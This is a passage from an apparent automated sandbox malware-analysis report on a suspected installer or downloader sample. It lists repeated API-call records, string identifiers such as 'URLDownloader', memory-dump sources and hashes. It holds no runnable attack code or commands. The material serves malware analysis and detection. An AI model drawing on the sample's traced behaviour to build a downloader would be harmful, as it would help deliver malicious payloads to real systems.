                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID: lF$lF
                                                                                    • API String ID: 2422867632-1147170537
                                                                                    • Opcode ID: 92e9bf36f33061f7ffdd7491b72976703523c6d92d1ec2ca90417502ef735539
                                                                                    • Instruction ID: c79f99a2a18cb61d71feea710bf58fa565dd156bb3bf8665f6744fc7077f86ea
                                                                                    • Opcode Fuzzy Hash: 92e9bf36f33061f7ffdd7491b72976703523c6d92d1ec2ca90417502ef735539
                                                                                    • Instruction Fuzzy Hash: 33017171605214AFC750CF9D9980B8EB7ECDB58361F10443AF508E73C1DA75DD0087A8
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(00000000,TWindowDisabler-Window,?,B)[,?,?,?,00000001,00000000,?,00619EC3,0066978C), ref: 00412BA7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID: B)[$TWindowDisabler-Window
                                                                                    • API String ID: 716092398-1377837600
                                                                                    • Opcode ID: 684ecf370dcf3c6758cf9d82a20f104a3e22c221ceaad4062406452089a2450d
                                                                                    • Instruction ID: d28f3a87fa927ce1738d04863a1b4a791b24e040aa09da8391ad3ec004184475
                                                                                    • Opcode Fuzzy Hash: 684ecf370dcf3c6758cf9d82a20f104a3e22c221ceaad4062406452089a2450d
                                                                                    • Instruction Fuzzy Hash: 74F074B2604118AF8B40DE9DDC81EDB77ECEB4D264B05412ABA08E3201D634ED118BA4
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(2C), ref: 00430A04
                                                                                      • Part of subcall function 00408B6C: SysReAllocStringLen.OLEAUT32(00000000,?,00000071), ref: 00408B86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocInitStringVariant
                                                                                    • String ID: 2C$WC
                                                                                    • API String ID: 4010818693-495268985
                                                                                    • Opcode ID: df370b3d9da647af4402dd277e6d6925b7b152161429339756cd47c20e76cd35
                                                                                    • Instruction ID: 96bda85ea37abc6d5613da839bc8b5d910035a35706cb6c2dd4bd2584f76f0b9
                                                                                    • Opcode Fuzzy Hash: df370b3d9da647af4402dd277e6d6925b7b152161429339756cd47c20e76cd35
                                                                                    • Instruction Fuzzy Hash: F1F0A471700608AFD700EB99DC92E9FB3FCEB48700FA04176F500E3290DA78AE0486A9
                                                                                    APIs
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0064413B,00000000,00644156,?,00000000,00000000,?,0064F4D6,00000006), ref: 00643DB2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID: RegisteredOrganization$RegisteredOwner
                                                                                    • API String ID: 3535843008-1113070880
                                                                                    • Opcode ID: 301571e57bfd22d937d0251fdeb13fcc7fbfda80df1ff37fee867360dc904415
                                                                                    • Instruction ID: 79ba88330415bd06f82effed11eda8edd571365fffeee20c77ff8264b35cb024
                                                                                    • Opcode Fuzzy Hash: 301571e57bfd22d937d0251fdeb13fcc7fbfda80df1ff37fee867360dc904415
                                                                                    • Instruction Fuzzy Hash: E9F0B470B04194AFDB10DAD4DD46BAA7BAFEF85344F241029E2409B391D6B0EF40CB55
                                                                                    APIs
                                                                                      • Part of subcall function 006449EC: FreeLibrary.KERNEL32(?,00650648,00000000,00650657,?,?,?,?,?,0065113B), ref: 00644A02
                                                                                      • Part of subcall function 006446DC: GetTickCount.KERNEL32 ref: 00644724
                                                                                      • Part of subcall function 00600808: SendMessageW.USER32(?,00000B01,00000000,00000000), ref: 00600827
                                                                                    • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0065113B), ref: 00650671
                                                                                    • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0065113B), ref: 00650677
                                                                                    Strings
                                                                                    • Detected restart. Removing temporary directory., xrefs: 0065062B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                    • String ID: Detected restart. Removing temporary directory.
                                                                                    • API String ID: 1717587489-3199836293
                                                                                    • Opcode ID: 6f776ffacad2af89d35688e394897bf6e83705840bcb12dca368fa9c17a4540f
                                                                                    • Instruction ID: 464bd2d836879dd3474a0288fef1e2a55e7a5b05e4adc84fe2957298e905eb94
                                                                                    • Opcode Fuzzy Hash: 6f776ffacad2af89d35688e394897bf6e83705840bcb12dca368fa9c17a4540f
                                                                                    • Instruction Fuzzy Hash: F1E0ABB52483402EF39137F6BC13A5B3F4EE7C7362F61043AFA0481441CC599864C138
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,?,00000004,006619DC,006006F2,00600B6C,00600610,?,00000B06,00000000,00000000), ref: 005B1C62
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                      • Part of subcall function 005B1BAC: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005B1CA2,?,00000004,006619DC,006006F2,00600B6C,00600610,?,00000B06,00000000,00000000), ref: 005B1BC3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule$AddressProc
                                                                                    • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                    • API String ID: 1883125708-2676053874
                                                                                    • Opcode ID: 6878c14f71f69b0723f96bc96d4fcaf4194bacb9fe624374ffc45413c8f78ab0
                                                                                    • Instruction ID: 9df0a5d5a98339ba50c13b8e37e12c07401c504aaeadd98406a6411a3d2f2949
                                                                                    • Opcode Fuzzy Hash: 6878c14f71f69b0723f96bc96d4fcaf4194bacb9fe624374ffc45413c8f78ab0
                                                                                    • Instruction Fuzzy Hash: 6DF05C302B07109FD7416F659C44FD53EADFB44342F401924F504962A0C7F41C80C76C
                                                                                    APIs
                                                                                      • Part of subcall function 005B1D88: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005B1D06,?,?,?,0064F751,0000000A,00000002,00000001,00000031,00000000,0064F97F), ref: 005B1D96
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,?,?,0064F751,0000000A,00000002,00000001,00000031,00000000,0064F97F,?,00000000,0064FA4C), ref: 005B1D10
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule$AddressProc
                                                                                    • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                    • API String ID: 1883125708-2866557904
                                                                                    • Opcode ID: e7dab807d206312efdb0421e04762fd5465d9bb62d82bfaba76103e697829b8c
                                                                                    • Instruction ID: 40c05ee6389ba05014c80f0bb6a4273d02a3409cfaf78f9ef14993339606f823
                                                                                    • Opcode Fuzzy Hash: e7dab807d206312efdb0421e04762fd5465d9bb62d82bfaba76103e697829b8c
                                                                                    • Instruction Fuzzy Hash: 14E0C2633A1E512E538072FA2CA1CEF088C9DA6A5A3900C36F505E3152D948DC02017D
                                                                                    APIs
                                                                                    • AcquireSRWLockExclusive.KERNEL32(1001C31C,?,URLDownloader,?,100015AC,1001C6D4), ref: 10015F8D
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(1001C31C,?,100015AC,1001C6D4), ref: 10015FC7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireRelease
                                                                                    • String ID: URLDownloader
                                                                                    • API String ID: 17069307-1891997712
                                                                                    • Opcode ID: c507f487d7d077287d29d7c699356b7419b72d79d52241de38d01319ea44f226
                                                                                    • Instruction ID: 6adcf340ed2f6481699652d891028e0f11606ccd9733c9b7c4ba67a8641b8b52
                                                                                    • Opcode Fuzzy Hash: c507f487d7d077287d29d7c699356b7419b72d79d52241de38d01319ea44f226
                                                                                    • Instruction Fuzzy Hash: 24F08234500618DFD310DF18C884E1977A4EB49676F15423DE9698F291C731D982CA52
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,005F8CBC,00000000,005F8D8E,?,?,0066978C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B0A0A
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                    • API String ID: 1646373207-1816364905
                                                                                    • Opcode ID: c75330aa7c8c5df12c7e8eb959d8e15b84fad59c46a3f443c355cdc9ba688192
                                                                                    • Instruction ID: 6e2db57afe9603e13bbcb28d8d27c56aba657c1237ebb3fd90a72f709f2b52c2
                                                                                    • Opcode Fuzzy Hash: c75330aa7c8c5df12c7e8eb959d8e15b84fad59c46a3f443c355cdc9ba688192
                                                                                    • Instruction Fuzzy Hash: AEE0266178070013DB00A2BA4D83EEF158A5B94700F105C3D7999D62D2EDBCE88082A2
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateMenu$Popup
                                                                                    • String ID: HOX
                                                                                    • API String ID: 257293969-2476314470
                                                                                    • Opcode ID: 3fef10723f1ca8ff26ecb47d99a67e8efce527985917f034024353e37165076f
                                                                                    • Instruction ID: 16515f4fc79d7f94603b2a7c1aa1a4c0f70e6e138b00580e915dac0b9c35f144
                                                                                    • Opcode Fuzzy Hash: 3fef10723f1ca8ff26ecb47d99a67e8efce527985917f034024353e37165076f
                                                                                    • Instruction Fuzzy Hash: F5F0C930604201CFDB00BF66D5C9B887B92BB55308F8454B9AC45AF25BD77488448FB1
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005B1CA2,?,00000004,006619DC,006006F2,00600B6C,00600610,?,00000B06,00000000,00000000), ref: 005B1BC3
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                    • API String ID: 1646373207-2498399450
                                                                                    • Opcode ID: 32f4064eec838c34c8f47ef9a1994eb5c6ace0f1976ee1f6d02c9e7c94af625d
                                                                                    • Instruction ID: 8c40f62a632f2fa97ec710fedad9e0295ca43648f38e841b9d187b64430073cf
                                                                                    • Opcode Fuzzy Hash: 32f4064eec838c34c8f47ef9a1994eb5c6ace0f1976ee1f6d02c9e7c94af625d
                                                                                    • Instruction Fuzzy Hash: 5DE09A75220700DFD781AF64AC88FDA3FE9F708B01F002819F544921A0D6F818C0CA28
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005B1D06,?,?,?,0064F751,0000000A,00000002,00000001,00000031,00000000,0064F97F), ref: 005B1D96
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                    • API String ID: 1646373207-260599015
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0065C502,00000001,00000000,0065C528), ref: 0065117A
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                    • API String ID: 1646373207-834958232
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
